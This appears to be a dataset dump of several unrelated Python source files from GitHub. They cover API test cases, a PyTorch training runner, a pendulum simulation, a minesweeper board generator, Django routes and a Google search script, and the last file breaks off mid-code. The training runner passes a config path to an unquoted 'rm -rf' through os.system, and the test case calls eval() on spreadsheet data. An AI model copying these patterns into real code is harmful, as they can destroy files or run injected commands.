TestAudit)\n # print(item['data'])\n params = eval(item['data'])\n # 000000000000000000V3版本的改动00000000000000000000\n par_sign = HandleSign.generate_sign(self.admin_token)\n print(\"签名和时间戳:\", par_sign)\n params.update(par_sign)\n print(params)\n # 0000000000000000000V3版本的改动000000000000000000000000000\n # ===========================================================\n expected = eval(item['expected'])\n method = item['method'].lower()\n # 调用接口之前:查询数据库该用户的项目数量\n sql = 'SELECT status FROM futureloan.loan WHERE id={}'.format(self.loan_id)\n start_status = self.db.find_one(sql)\n print(\"调用项目前的状态:\", start_status)\n # 第二步:发送请求,获取接口返回的实际结果\n response = requests.request(method=method, url=url, headers=self.admin_headers, json=params)\n res = response.json()\n # 调用接口之后:查询数据库该用户的项目数量\n end_status = self.db.find_one(sql)\n print(\"调用项目后的状态:\", end_status)\n print(self.loan_id)\n # add_id = str(self.db.find_count(sql)[0])\n # print(\"项目id为:\", add_id)\n # 判断是否是审核通过的用例,并且审核成功,如果是则保存项目id为审核通过的项目id\n if item['title']=='审核通过' and res['msg']=='OK':\n TestAudit.pass_loan_id=params['loan_id']\n # 第三步;断言\n print(\"预期结果:\", expected)\n print(\"实际结果:\", res)\n try:\n # 断言code和msg字段是否一致\n # self.assertEqual(expected['code'],res['code'])\n # self.assertEqual(expected['msg'], res['msg'])\n self.assertDictIn(expected, res)\n # =====================读取excel中有标记成功的==============================\n # 根据添加项目是否成功,来对数据库进分别的校验\n if res['msg'] == \"OK\":\n # 注册成功\n self.assertNotEqual(start_status, end_status)\n print('审核通过或不通过')\n else:\n self.assertEqual(start_status, end_status)\n print('审核错误')\n except AssertionError as e:\n # 记录日志\n stt_log.error(\"用例--【{}】---执行失败\".format(item['title']))\n # stt_log.error(e)\n stt_log.exception(e)\n # 回写结果到excel(根据公司中实际需求来决定用例结果写不写到excel中)#注:回写excel需要花费大量的时问\n raise e\n else:\n stt_log.info(\"用例--【{}】---执行成功\".format(item['title']))\n\n def assertDictIn(self, expected, res):\n \"\"\"字典成员运算的逻辑\"\"\"\n for k, v in 
expected.items():\n if res.get(k) == v:\n pass\n else:\n raise AssertionError(\"{} not in {}\".format(expected, res))","repo_name":"stt1234567/py35_21day_project","sub_path":"testcases/test_06audit.py","file_name":"test_06audit.py","file_ext":"py","file_size_in_byte":6389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"832540801","text":"\"\"\"Runs experiments.\"\"\"\n\nimport argparse\nfrom copy import deepcopy\nimport os\n\nimport torch\n\nfrom train import train, train_many\nfrom parse_config import parse_config\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n\ndef get_checkpoints(save_dir: str, model_names: list[str], models: list[torch.nn.Module], \n optimizers: list[torch.optim.Optimizer]) -> tuple[torch.nn.Module, torch.optim.Optimizer]:\n \"\"\"Returns the latest models from a directory.\"\"\"\n\n # Load the models.\n max_epoch = None\n for model, name, optimizer in zip(models, model_names, optimizers):\n\n # Get the latest epoch.\n model_save_dir = os.path.join(save_dir, \"models\", name)\n if not os.path.exists(model_save_dir):\n assert max_epoch is None\n return models, optimizers, None\n model_files = os.listdir(model_save_dir)\n model_max_epoch = max([int(fname.split(\"_\")[1].split(\".pth\")[0]) for fname in model_files])\n if max_epoch is None:\n max_epoch = model_max_epoch\n assert max_epoch == model_max_epoch\n\n # Load the model.\n save_path = os.path.join(model_save_dir, f\"epoch_{max_epoch}.pth\")\n checkpoint = torch.load(save_path)\n model.load_state_dict(checkpoint['model_state_dict'])\n optimizer.load_state_dict(checkpoint['optimizer_state_dict'])\n\n return models, optimizers, max_epoch\n\n\ndef run_experiment(config: dict):\n \"\"\"Runs an experiment.\"\"\"\n\n device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n\n # Load training parameters.\n out_dir = config['save_dir']\n training_cfg = config['training']\n\n # Load the dataset.\n dataset_cfg = config['datasets']\n dataset_a_train, _ = dataset_cfg['initial']\n dataset_b_train, _ = dataset_cfg['finetune']\n # dataset_a_train = torch.utils.data.Subset(dataset_a_train, range(50))\n # dataset_b_train = torch.utils.data.Subset(dataset_b_train, range(50))\n\n # Load the models.\n model_names = list(config['schedules'])\n models = [config['schedules'][name]['model'] for name in model_names]\n model_infos = [{} for _ in model_names]\n pre_train_weights = [deepcopy(model.get_conv_weights().detach().clone().to(device)) for model in models]\n\n # Unconstrain + freeze the models if necessary for finetuning.\n for name, model in zip(model_names, models):\n init_params = config['schedules'][name]['initial']\n if init_params['freeze_first_layer']:\n model.freeze_first_layer()\n if not init_params['gabor_constrained']:\n model.unconstrain()\n \n # Set the device since we don't at init. 
(TODO: fix this).\n model.to(device)\n model.g1.device = device\n\n # Set up the models + data for initial training.\n optimizers_a = [torch.optim.Adam(\n model.parameters(), **config['schedules'][name]['initial']['optimizer_params']) \n for name, model in zip(model_names, models)]\n dataloader_a = torch.utils.data.DataLoader(dataset_a_train, **training_cfg['dataloader_params'])\n save_dir_a = os.path.join(out_dir, 'dataset_a')\n\n # Resume training if any training has already been done.\n models, optimizers_a, last_epoch = get_checkpoints(save_dir_a, model_names, models, optimizers_a)\n starting_epoch_a = last_epoch + 1 if last_epoch is not None else 0\n\n # Run the initial training.\n if starting_epoch_a == training_cfg['initial']['epochs']:\n print(\"\\nFinished training on dataset A.\")\n else:\n print(\"\\nTraining on dataset A...\")\n train_many(models=models, optimizers=optimizers_a, model_names=model_names, \n model_infos=model_infos, dataloader=dataloader_a, save_dir=save_dir_a, device=device, \n starting_epoch = starting_epoch_a, n_epochs = training_cfg['initial']['epochs'])\n\n # Check that weights changed as expected.\n post_train_weights = [deepcopy(model.get_conv_weights().detach().clone()) for model in models]\n for post_train_weight, pre_train_weight, name in zip(post_train_weights, pre_train_weights, model_names):\n if config['schedules'][name]['initial']['freeze_first_layer']:\n assert torch.allclose(post_train_weight, pre_train_weight), \\\n \"Weights should not have changed after initial training.\"\n else:\n assert not torch.allclose(post_train_weight, pre_train_weight), \\\n \"Weights should have changed after initial training.\"\n \n # Unconstrain + freeze the models if necessary for finetuning.\n for name, model in zip(model_names, models):\n finetune_params = config['schedules'][name]['finetune']\n if finetune_params['freeze_first_layer']:\n model.freeze_first_layer()\n if not finetune_params['gabor_constrained']:\n model.unconstrain()\n\n # Set up the models + data for fine-tuning.\n dataloader_b = torch.utils.data.DataLoader(dataset_b_train, **training_cfg['dataloader_params'])\n optimizers_b = [torch.optim.Adam(\n model.parameters(), **config['schedules'][name]['finetune']['optimizer_params']) \n for name, model in zip(model_names, models)]\n save_dir_b = os.path.join(out_dir, 'dataset_b')\n\n # Resume training if any training has already been done.\n models, optimizers_b, last_epoch = get_checkpoints(save_dir_b, model_names, models, optimizers_b)\n starting_epoch_b = last_epoch + 1 if last_epoch is not None else 0\n if starting_epoch_b > 0:\n assert starting_epoch_a == training_cfg['initial']['epochs'], \\\n \"Cannot resume training on dataset B if training on dataset A was not completed.\"\n\n # Run the fine-tuning.\n if starting_epoch_b == training_cfg['finetune']['epochs']:\n print(\"\\nFinished fine-tuning on dataset B.\")\n else:\n print(\"\\nFine-tuning on dataset B.\")\n train_many(models=models, optimizers=optimizers_b, model_names=model_names, \n model_infos=model_infos, dataloader=dataloader_b, save_dir=save_dir_b, device=device, \n starting_epoch = starting_epoch_b, n_epochs = training_cfg['finetune']['epochs'])\n\n # Check that weights changed as expected.\n post_finetune_weights = [deepcopy(model.get_conv_weights().detach().clone()) for model in models]\n for post_finetune_weight, post_train_weight, name in zip(post_finetune_weights, post_train_weights, model_names):\n if config['schedules'][name]['finetune']['freeze_first_layer']:\n assert 
torch.allclose(post_finetune_weight, post_train_weight), \\\n \"Weights should not have changed after fine-tuning.\"\n else:\n assert not torch.allclose(post_finetune_weight, post_train_weight), \\\n \"Weights should have changed after fine-tuning.\"\n\n\ndef main():\n\n # Parse command line arguments.\n parser = argparse.ArgumentParser(description=\"Run experiments.\")\n parser.add_argument(\"config\", type=str, help=\"Path to the configuration file.\")\n parser.add_argument(\"--overwrite\", action=\"store_true\", help=\"Overwrite existing results instead of continuing.\")\n\n args = parser.parse_args()\n\n # Parse the configuration file + run the experiment.\n config = parse_config(args.config)\n if args.overwrite:\n os.system(f\"rm -rf {config['save_dir']}\")\n\n # Change the seed each repeat so that we get different random initializations + adjust the save directory.\n og_save_dir = config['save_dir']\n og_seed = config['seed']\n for i in range(config['n_repeats']):\n repeat_seed = og_seed + i\n repeat_save_dir = os.path.join(og_save_dir, str(i))\n\n config = parse_config(args.config, {'seed': repeat_seed, 'save_dir': repeat_save_dir})\n\n print(f\"Running repeat {i+1} of {config['n_repeats']}\")\n run_experiment(config)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"samacqua/gabor-constrained-nns","sub_path":"experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":7830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"70161497524","text":"__author__ = 'Todd Young'\n__email__ = 'youngmt1@ornl.gov'\n__version__ = '0.0.1'\n\nimport logging\nfrom gym.envs.registration import register\n\n\nlogger = logging.getLogger(__name__)\n\nregister(\n id='MoleculesSim-v0',\n entry_point='gym_molecules.envs:MoleculesEnv',\n timestep_limit=1000,\n reward_threshold=1.0,\n nondeterministic = True,\n)\n","repo_name":"yngtodd/gym_molecules","sub_path":"gym_molecules/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"27976642088","text":"'''\nPROGRAM chaos_theta_t\nthis program solve for the chaotic pendulum \nAuthor: Chen Yangyao Last Modify: 20160424\n'''\n# import packages needed\nimport matplotlib.pyplot as plt\nimport numpy as np\n# class CHAOS solves for the chaotic pendulum\n# the equation considers both damping, driving, and nonlinearity\n# where: Fd, omgd- amplitude and frequency of driving force\n# size,period - number of steps in an period of driving force, total computing number of period\n# theta0 - initial angle position\n# omg0 =0 -initial angular velocity will be zero\nclass CHAOS(object):\n def __init__(self,_Fd=1.2, _theta0=0.2, _omgd=2./3., _size=100., _period=4.):\n self.theta, self.omg, self.t=[_theta0], [0.0], [0.0]\n self.size, self.period= int(round(_size)), int(round(_period))\n self.dt=(2.*np.pi/_omgd)/self.size\n self.time=(2.*np.pi/_omgd)*self.period\n self.n=int(np.round(self.time/self.dt))\n self.g, self.l, self.q=9.8, 9.8, 1./2.\n self.Fd, self.omgd=_Fd, _omgd \n def calculate(self): # use fourth-order Runge-Kutta method to solve the chaotic pendulum\n for i in range(self.n):\n self.t1,self.t2,self.t3,self.t4=self.t[-1],self.t[-1]+self.dt/2.,self.t[-1]+self.dt/2.,self.t[-1]+self.dt\n self.omg1=self.omg[-1]\n self.theta1=self.theta[-1]\n self.omg2=self.omg1+(-self.g/self.l*np.sin(self.theta1)-self.q*self.omg1+ \\\n 
self.Fd*np.sin(self.omgd*self.t1))*self.dt/2.\n self.theta2=self.theta1+self.omg1*self.dt/2.\n self.omg3=self.omg1+(-self.g/self.l*np.sin(self.theta2)-self.q*self.omg2+ \\\n self.Fd*np.sin(self.omgd*self.t2))*self.dt/2.\n self.theta3=self.theta1+self.omg2*self.dt/2.\n self.omg4=self.omg1+(-self.g/self.l*np.sin(self.theta3)-self.q*self.omg3+ \\\n self.Fd*np.sin(self.omgd*self.t3))*self.dt\n self.theta4=self.theta1+self.omg3*self.dt\n self.t.append(self.t4)\n self.omg.append(self.omg1+ \\\n 1./6.*(-self.g/self.l)*(np.sin(self.theta1)+2.*np.sin(self.theta2)+2.*np.sin(self.theta3)+np.sin(self.theta4))*self.dt+ \\\n 1./6.*(-self.q)*(self.omg1+2.*self.omg2+2.*self.omg3+self.omg4)*self.dt +\\\n 1./6.*self.Fd*(np.sin(self.omgd*self.t1)+2.*np.sin(self.omgd*self.t2)+2.*np.sin(self.omgd*self.t3)+np.sin(self.omgd*self.t4))*self.dt\n )\n self.theta.append(self.theta1+1./6.*(self.omg1+2.*self.omg2+2.*self.omg3+self.omg4)*self.dt)\n while self.theta[-1]>np.pi: # reset the angle to keep it in range [-pi,pi]\n self.theta[-1]=self.theta[-1]-2.*np.pi\n while self.theta[-1]<-np.pi:\n self.theta[-1]=self.theta[-1]+2.*np.pi\n def calculate_allangle(self): # calculate, but don't reset the angle to keep it in range [-pi,pi]\n for i in range(self.n):\n self.t1,self.t2,self.t3,self.t4=self.t[-1],self.t[-1]+self.dt/2.,self.t[-1]+self.dt/2.,self.t[-1]+self.dt\n self.omg1=self.omg[-1]\n self.theta1=self.theta[-1]\n self.omg2=self.omg1+(-self.g/self.l*np.sin(self.theta1)-self.q*self.omg1+ \\\n self.Fd*np.sin(self.omgd*self.t1))*self.dt/2.\n self.theta2=self.theta1+self.omg1*self.dt/2.\n self.omg3=self.omg1+(-self.g/self.l*np.sin(self.theta2)-self.q*self.omg2+ \\\n self.Fd*np.sin(self.omgd*self.t2))*self.dt/2.\n self.theta3=self.theta1+self.omg2*self.dt/2.\n self.omg4=self.omg1+(-self.g/self.l*np.sin(self.theta3)-self.q*self.omg3+ \\\n self.Fd*np.sin(self.omgd*self.t3))*self.dt\n self.theta4=self.theta1+self.omg3*self.dt\n self.t.append(self.t4)\n self.omg.append(self.omg1+ \\\n 1./6.*(-self.g/self.l)*(np.sin(self.theta1)+2.*np.sin(self.theta2)+2.*np.sin(self.theta3)+np.sin(self.theta4))*self.dt+ \\\n 1./6.*(-self.q)*(self.omg1+2.*self.omg2+2.*self.omg3+self.omg4)*self.dt +\\\n 1./6.*self.Fd*(np.sin(self.omgd*self.t1)+2.*np.sin(self.omgd*self.t2)+2.*np.sin(self.omgd*self.t3)+np.sin(self.omgd*self.t4))*self.dt\n )\n self.theta.append(self.theta1+1./6.*(self.omg1+2.*self.omg2+2.*self.omg3+self.omg4)*self.dt) \n def plot_theta(self,_ax): # the theta(angle)-t plot\n _ax.plot(self.t,self.theta,'-',label=r'$F_d = $'+' %.2f'%self.Fd)\n def plot_omg(self,_ax): # the omega(angular velocity)-t plot\n _ax.plot(self.t,self.omg,'-',label=r'$F_d = $'+' %.2f'%self.Fd)\n def plot_phase(self,_ax): # the phase-space plot\n _ax.plot(self.theta,self.omg,'-',label=r'$F_d = $'+' %.2f'%self.Fd)\n def plot_Poincare(self,_ax): # the Poincare section plot\n self.t_Poincare, self.omg_Poincare, self.theta_Poincare=[],[],[]\n for i in range(int(np.round(self.period))):\n self.t_Poincare.append(self.t[(i+1)*self.size])\n self.omg_Poincare.append(self.omg[(i+1)*self.size])\n self.theta_Poincare.append(self.theta[(i+1)*self.size])\n _ax.scatter(self.theta_Poincare[300:], self.omg_Poincare[300:], s=8,label=r'$F_d = $'+' %.2f'%self.Fd)\n\n# class CHAOS_VIA solves two identical pendulum systems\n# but initial angle has a difference 1E-3\n# where: Fd- amplitude of driving force\n# theta01,theta02 - initial angle of two pendulum \nclass CHAOS_VIA(object):\n def __init__(self,_Fd=1.2,_theta01=0.2,_theta02=0.2-1E-3):\n self.Fd=_Fd \n 
self.theta0=[_theta01,_theta02]\n def calculate(self):\n self.cal=CHAOS(self.Fd, self.theta0[0],2./3.,100,8)\n self.cal.calculate()\n self.t=self.cal.t\n self.theta1=self.cal.theta\n self.cal=CHAOS(self.Fd, self.theta0[1],2./3.,100,8)\n self.cal.calculate()\n self.theta2=self.cal.theta\n self.theta=np.array(self.theta1)-np.array(self.theta2)\n self.theta=np.abs(self.theta)\n def plot_via(self,_ax):\n _ax.semilogy(self.t, self.theta,'-r',label=r'$F_d = $'+' %.2f'%self.Fd)\n \n \n# give figures of chaotic pendulum\nfig=plt.figure(figsize=(10,8))\nax1=plt.subplot(321)\nplt.title(r'$\\theta$'+' versus '+r'time',fontsize=18)\nax2=plt.subplot(323)\nplt.yticks([-np.pi,-np.pi/2,0,np.pi/2,np.pi],[r'$-\\pi$',r'$-\\pi /2$',r'$0$',r'$\\pi/2$',r'$\\pi$'])\nax2.set_ylim(-3.5,3.5)\nax3=plt.subplot(325)\nplt.yticks([-np.pi,-np.pi/2,0,np.pi/2,np.pi],[r'$-\\pi$',r'$-\\pi /2$',r'$0$',r'$\\pi/2$',r'$\\pi$'])\nax3.set_ylim(-3.5,3.5)\n\n# ax1,ax2,ax3 : theta-t plot\ncal=CHAOS(0.,0.2,2./3.,100.,4.) #Fd=0\ncal.calculate()\ncal.plot_theta(ax1)\ncal=CHAOS(0.5,0.2,2./3.,100.,4.) #Fd=0.5\ncal.calculate()\ncal.plot_theta(ax2)\ncal=CHAOS(1.2,0.2,2./3.,100.,4.) #Fd=1.2\ncal.calculate()\ncal.plot_theta(ax3)\n\n# ax4,ax5,ax6 : theta-difference of two pendulums,with different initial angle\nax4=plt.subplot(322)\nplt.title(r'$\\Delta \\theta$'+' versus '+r'time',fontsize=18)\nax5=plt.subplot(324)\nax6=plt.subplot(326)\ncal=CHAOS_VIA(0.0) #Fd=0\ncal.calculate()\ncal.plot_via(ax4)\ncal=CHAOS_VIA(0.5) #Fd=0.5\ncal.calculate()\ncal.plot_via(ax5)\ncal=CHAOS_VIA(1.2) #Fd=1.2\ncal.calculate()\ncal.plot_via(ax6)\n\nplt.show()\n\n \n \n \n ","repo_name":"ChenYangyao/computationalphysics_N2013301020169","sub_path":"chapter3_201604_22/ch3_chaos_theta_t.py","file_name":"ch3_chaos_theta_t.py","file_ext":"py","file_size_in_byte":7464,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"75"} +{"seq_id":"16122237189","text":"import random\n\n\nclass SpoilerMinesweeper:\n WON = 1\n CONTINUE = 0\n LOST = 2\n\n BOMB = -1\n UNCOVERED = -2\n\n def __init__(self, height: int = 10, width: int = 10, bombs: int = 10): # noqa C901\n self.board = [[0 for _ in range(width)] for _ in range(height)]\n if bombs > height * width:\n raise MinesweeperError(\"Number of bombs cannot be bigger than the number of squares\")\n placed = 0\n while placed < bombs:\n h = random.randint(0, height - 1)\n w = random.randint(0, width - 1)\n if self.board[h][w] == 0:\n self.board[h][w] = -1 # place a bomb\n placed += 1\n for h in range(height):\n for w in range(width):\n if self.board[h][w] == -1:\n continue\n # count the bombs around a square\n for dx in (-1, 0, 1):\n for dy in (-1, 0, 1):\n if h + dx < 0 or w + dy < 0 or h + dx >= height or w + dy >= width:\n continue\n if not dx and not dy:\n continue\n if self.board[h + dx][w + dy] == -1:\n self.board[h][w] += 1\n\n print(self)\n\n def __str__(self):\n return \"\\n\".join([\"\".join(map(self._str, row)) for row in self.board])\n\n def discord_str(self, spoilers: bool = True):\n d_str = \"\\n\".join(\n [\"\".join(map(lambda x: self._discord_str(x, spoilers), row))\n for row in self.board]\n )\n if len(d_str) >= 2000:\n raise MinesweeperError(\"Board to big to send through discord\")\n return d_str\n\n def _str(self, n: int):\n if n == -1:\n return \"*\"\n if n == 0:\n return \"-\"\n return str(n)\n\n def _discord_str(self, n: int, spoiler: bool = False):\n fmt = \"<<:%s:>>\" if spoiler else \":%s:\"\n if n == -1:\n return fmt % \"bomb\"\n else:\n return fmt % 
['black_large_square', 'one', 'two', 'three', 'four', 'five', 'six', 'seven', 'eight'][n]\n\n\nclass MinesweeperError(Exception):\n pass\n","repo_name":"aoi-bot/Aoi","sub_path":"libs/minesweeper.py","file_name":"minesweeper.py","file_ext":"py","file_size_in_byte":2184,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"75"} +{"seq_id":"19509065473","text":"from django.conf.urls import url\nfrom article.views import (\n create_article,\n edit_article,\n article_details,\n article_category_index_views,\n drafts,\n user_articles\n)\n\nurlpatterns = [\n url(r'^new/$', create_article, name='create_article'),\n url(r'^edit/(?P\\d+)$', edit_article, name='edit_article'),\n url(r'^details/(?P\\d+)$', article_details, name='details'),\n url(r'^category/(?P\\d+)$', article_category_index_views, name='article_category'),\n url(r'^drafts$', drafts, name='user_drafts'),\n url(r'^author/(?P\\d+)$', user_articles, name='user_articles'),\n]\n","repo_name":"tony90s/hxw_blog","sub_path":"hxw_blog/djangoapps/article/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"13885760501","text":"import pandas as pd\r\nfrom json import dumps\r\nfrom googleapiclient.discovery import build\r\n\r\n\r\n\r\nmy_api_key = \"YOUR GOOGLE CUSTOM SEARCH API KEY\"\r\nmy_cse_id = \"YOUR SEARCH ENGINE ID\"\r\n\r\n\r\ndef google_search(search_term, api_key, cse_id, **kwargs):\r\n service = build(\"customsearch\", \"v1\", developerKey=api_key)\r\n res = service.cse().list(q=search_term, cx=cse_id, **kwargs).execute()\r\n return res['items']\r\n\r\n\r\n#results = google_search('what is Hadamard gate?', my_api_key, my_cse_id, num=2)\r\n\r\n'''zzz\r\nfor result in results:\r\n \r\n\r\n title = result['title']\r\n link = result['formattedUrl']\r\n dis = result['snippet']\r\n print (title)\r\n print (link)\r\n print (dis)\r\n'''\r\n\r\n\r\n# Show all columns in pandas dataframe when printing to stdout\r\npd.set_option(\"display.max_columns\", None)\r\n\r\ndatafile='../01_db_exploration/data/magnetic-dimensionality-v100.csv'\r\ndf0 = pd.read_csv(datafile, ';')\r\n#print(df0.keys())\r\n\r\n# Drop all the columns except these ones\r\ndf = df0[['icsd_code','dimension', 'chemical_structural_formula', 'num_atoms', 'space_group_symmetry', 'number_index', 'structure_type', 'valence', 'metal_neigh_coordination', 'partial_occupancy']].copy()\r\n\r\n# Print only materials with a given number of atoms, two-dimensional and no partial occupancy of atomic sites\r\nprint(df[ (df.num_atoms<=3) & (df.dimension==2) & (df.partial_occupancy=='no') ])\r\n\r\n\r\n# Dictionary with the data gathered in the search\r\ngathered_data={'material':[],'search_word':[],'search_result':[]}\r\n\r\n# List of materials to be searched\r\nlista_de_materiais=['Fe Cl2','Cr Se2']\r\n\r\n# List of words to be searched for\r\nlista_de_termos=['magnetic','metal','insulator']\r\n\r\n\r\n# Loop over material and search words\r\n# 'google_search_for()' should be substituted with appropriate method from google API\r\nfor mat in lista_de_materiais:\r\n for word in lista_de_termos:\r\n gathered_data['material'].append(mat)\r\n gathered_data['search_word'].append(word)\r\n try:\r\n\r\n gathered_data['search_result'].append(google_search(mat+\" \"+word, my_api_key, my_cse_id, num=1))\r\n except:\r\n gathered_data['search_result'].append('No results')\r\n \r\n \r\n# Writes gathered_data dictionary into json file\r\nwith 
open('data/gresults.json', 'w') as jsonf:\r\n jsonf.write(dumps(gathered_data)) \r\n\r\n\r\n\r\n","repo_name":"VictorRayan/scientific-python","sub_path":"ALON_SearchCustomMaterials.py","file_name":"ALON_SearchCustomMaterials.py","file_ext":"py","file_size_in_byte":2308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"405648567","text":"from datetime import datetime\nimport json\nfrom django.http import JsonResponse\nfrom django.views.decorators.http import require_http_methods\nfrom django.views.decorators.csrf import csrf_exempt\nfrom externalInfractions.api.interactors.createMockInfractionInteractor import createMockInfractionInteractor\nfrom externalInfractions.api.serializers import ExternalInfractionSerializer\n\n@require_http_methods([\"POST\"])\n@csrf_exempt # Use this decorator for development to disable CSRF protection; use proper CSRF handling in production\ndef createMockInfraction(request):\n body = json.loads(request.body.decode('utf-8'))\n\n code = body.get(\"code\")\n infractionCode = body.get(\"infractionCode\")\n ballotNumber = body.get(\"ballotNumber\")\n name = body.get(\"name\")\n level = body.get(\"level\")\n fine = body.get(\"fine\")\n date = body.get(\"date\")\n formatted_date = datetime.strptime(date, '%Y-%m-%d')\n\n mockInfractionCreated = createMockInfractionInteractor(code, infractionCode, ballotNumber, name, level, fine, formatted_date)\n if mockInfractionCreated:\n statusCode = 201\n mockInfraction = ExternalInfractionSerializer(mockInfractionCreated)\n responseMessage = 'License Plate created successfully'\n response = {\n \"responseMessage\": responseMessage,\n \"mockInfraction\": mockInfraction.data\n }\n return JsonResponse(response, status=statusCode, safe=False)\n else:\n statusCode = 400\n responseMessage = 'License Plate creation failed'\n response = {\n \"responseMessage\": responseMessage,\n \"mockInfraction\": None,\n }\n return JsonResponse(response, status=statusCode, safe=False)","repo_name":"Arix69sex/PRY20231013-LPDRBackend","sub_path":"externalInfractions/api/views/createMockInfraction.py","file_name":"createMockInfraction.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"30618528826","text":"import re\n\nfrom pylons import tmpl_context as c\nfrom vulcanforge.artifact.model import Shortlink, ArtifactReference\n\n\nclass ArtifactAPI(object):\n \"\"\"\n Global entry point for artifact-related API, most notably for artifact\n references. Mounted on pylons.app_globals as artifact\n\n \"\"\"\n # regex to extract shortlinks from markdown\n SHORTLINK_RE = re.compile(\n r'''(? int:\n n = len(nums)\n if n==1:\n return nums[0]\n else:\n prev2 = nums[0]\n prev = max(prev2,nums[1])\n \n result=0\n for i in range(2,n):\n result = max(prev, prev2+nums[i])\n prev2=prev\n prev=result\n \n return prev\n","repo_name":"alexrusev03/LeetCode-Problems","sub_path":"Python/198. House Robber.py3","file_name":"198. 
House Robber.py3","file_ext":"py3","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"33047025783","text":"from eightball import get_final_predictions\nfrom predictor import MarketPredictor\nimport datetime\n\nif __name__ == '__main__':\n days_into_future = 1\n date_to_predict = (datetime.datetime.now() + datetime.timedelta(days=days_into_future)).strftime(\"%Y-%m-%d\")\n stock = \"GRTS\"\n print(\"Date Predicted: \" + date_to_predict)\n print(\"Stock Predicted: \" + stock)\n mp = MarketPredictor(stock)\n mp.load_data()\n mp.fit_inital()\n raw_preds = mp.predict(date_to_predict)\n unweighted_results = [raw_preds['Output Values'][x] for x in range(5)]\n print(\"\\n\")\n print(\"Raw Results:\")\n print(unweighted_results)\n weighted_results = get_final_predictions(stock, date_to_predict)\n print(\"\\n\")\n print(\"Weighted Results: \")\n print(weighted_results)\n","repo_name":"karthiksing05/8ball","sub_path":"eightballTest.py","file_name":"eightballTest.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"34332993881","text":"import os\nimport argparse\n\n\ndef getFileList(dir: str, extract: str) -> list:\n fileList = []\n filenames = os.listdir(dir)\n for filename in filenames:\n ext = os.path.splitext(filename)[-1]\n if ext == extract:\n fileList.append(filename)\n return fileList\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"-d\", \"--dataset\", help=\"dataset path\", type=str, default=\"./dataset/train\"\n )\n parser.add_argument(\"-s\", \"--size\", help=\"image size\", type=int, default=640)\n parser.add_argument(\"-l\", \"--limit\", help=\"limit of pixels\", type=int, default=8)\n args = parser.parse_args()\n path = args.dataset\n size = args.size\n limit = args.limit\n fileList = getFileList(path, \".txt\")\n limit = limit * limit\n counter = 0\n labelcounter = 0\n # change dir\n os.chdir(path)\n for file in fileList:\n with open(file) as f:\n for line in f:\n labelcounter += 1\n temp = line.split(\" \")\n w = float(temp[3]) * size\n h = float(temp[4]) * size\n pixels = round(w * h)\n if pixels <= limit:\n counter += 1\n print(counter)\n print(labelcounter)\n print(len(fileList))\n print(limit)","repo_name":"225ceV/tiny","sub_path":"script/findLess.py","file_name":"findLess.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"10948581635","text":"# %%\nimport pandas as pd\nimport numpy as np\nimport plotly.express as px\nfrom graph_ex import *\n\nfrom geopandas.geodataframe import GeoDataFrame\n\ngroup_error_col = \"error\"\nclass step_rep_geo:\n def __init__(self, df: GeoDataFrame, weight_objective: int, deepness: int = None) -> None:\n df_has_requested_cols = np.isin([weight_col, group_id_col, group_weight_col], df.columns).all()\n assert df_has_requested_cols, \"missing required columns\"\n\n self.geo_df: GeoDataFrame = df.sort_values(by=weight_col)\n self.weight_objective: int = weight_objective\n \n\n self.group_ids_sorted_by_weight = self.geo_df[group_id_col]\n self.geo_df[group_error_col] = self.geo_df[group_weight_col] - self.weight_objective\n self.loss = ((self.geo_df[group_error_col])**2).sum()\n self.can_improve = (self.geo_df[group_error_col] < 0).sum() > 1\n self.deepness = deepness if deepness else 0\n \n def get_groups_weights(self, 
groups):\n ids = [id for group_id in groups for id in group_id.split(',')]\n return self.geo_df[weight_col][ids]\n\n def get_groups_as_sets(self) -> list[set]:\n return self.geo_df[group_id_col].map(set)\n\n def get_geo_group_connections(self, group_id:list[str]) -> GeoDataFrame:\n ids = group_id.split(',')\n dissolved_group: gpd.GeoSeries = self.geo_df.loc[ids].dissolve().geometry\n assert dissolved_group.shape[0] == 1, \"There shouldn't be more than one shape\"\n touches_group_filter = self.geo_df.geometry.touches(dissolved_group[0])\n # touches_group_filter[filter_in_group] = False\n return self.geo_df[touches_group_filter].copy()\n\n def get_group_connections(self, group_id:list[str]):\n return self.get_geo_group_connections(group_id)[group_id_col]\n\n def group_connections_respecting_objective(self, group_id) -> pd.Series:\n group_connections_df: pd.DataFrame = self.get_geo_group_connections([group_id])\n if len(group_connections_df) == 0:\n return []\n square_errors = ((group_connections_df[weight_col] + self.get_groups_weights(group_id)) - self.weight_objective)**2\n\n indices_sorted_closest_to_objective:pd.Series = square_errors.argsort()\n return group_connections_df[group_id_col][indices_sorted_closest_to_objective]\n\n def fuse(self, group_ids_to_fuse:list[str]):\n \n ids = [id for group_id in group_ids_to_fuse for id in group_id.split(',')]\n\n new_geo_df: gpd.GeoDataFrame = self.geo_df.copy()\n new_geo_df.loc[ids, group_weight_col] = new_geo_df[group_weight_col][ids].sum()\n 